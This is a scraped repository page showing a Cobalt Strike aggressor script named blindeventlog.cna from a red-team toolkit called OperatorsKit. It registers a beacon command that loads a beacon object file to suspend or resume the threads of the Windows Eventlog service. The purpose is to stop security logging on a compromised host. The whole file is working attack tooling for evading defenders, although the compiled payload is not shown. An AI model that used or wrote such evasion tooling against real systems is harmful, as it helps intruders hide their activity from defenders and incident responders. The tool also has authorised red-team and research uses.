Domovská stránka Prehľadávať Pomoc
Prihlásiť sa
zhensolid
/
OperatorsKit
1
0
Fork 0
Súbory Issues 0 Pull requesty 0 Wiki
Strom: 95f153361a
Branche Tagy
OperatorsKit
/
KIT
/
BlindEventlog
/
blindeventlog.cna

blindeventlog.cna 1.1 KB
História Raw

1234567891011121314151617181920212223242526272829303132 
  1. # author REDMED-X
    2. 

  2. 

  3. beacon_command_register(
    4. 

  4.     "blindeventlog", "Blind Eventlog by suspending its threads.",
    5. 

  5.     "INFO:\nBlind Eventlog by suspending its threads. This technique requires elevated privileges.\nBe aware that all events, from the period the threads were suspended, will be pushed to Eventlog the moment the threads are resumed.\n\nOPTIONS:\n[suspend]: find and suspend all Eventlog threads and disrupt its functionality\n[resume]: find and resume all Eventlog threads and restore its functionality\n\n" .
    6. 

  6.     "USAGE:\nblindeventlog <suspend | resume>\n\n");
    7. 

  7. 

  8. 

  9. alias blindeventlog {
    10. 

  10.     $bid = $1;
    11. 

  11.     $action = $2;
    12. 

  12. 

  13.     if ($action eq "suspend" || $action eq "resume") {
    14. 

  14.     }
    15. 

  15.     else {
    16. 

  16.         berror($bid, "Please specify one of the following actions: suspend | resume\n");
    17. 

  17.         return;
    18. 

  18.     }
    19. 

  19. 	
    20. 

  20.     # Read in the right BOF file
    21. 

  21.     $handle = openf(script_resource("blindeventlog.o"));
    22. 

  22.     $data   = readb($handle, -1);
    23. 

  23.     closef($handle);
    24. 

  24. 

  25.     # Pack our arguments
    26. 

  26.     $arg_data  = bof_pack($bid, "z", $action);
    27. 

  27. 

  28.     blog($bid, "Tasked to interact with Eventlog..");
    29. 

  29.     beacon_inline_execute($bid, $data, "go", $arg_data);
    30. 

  30. }
    31. 

  31. 

  32.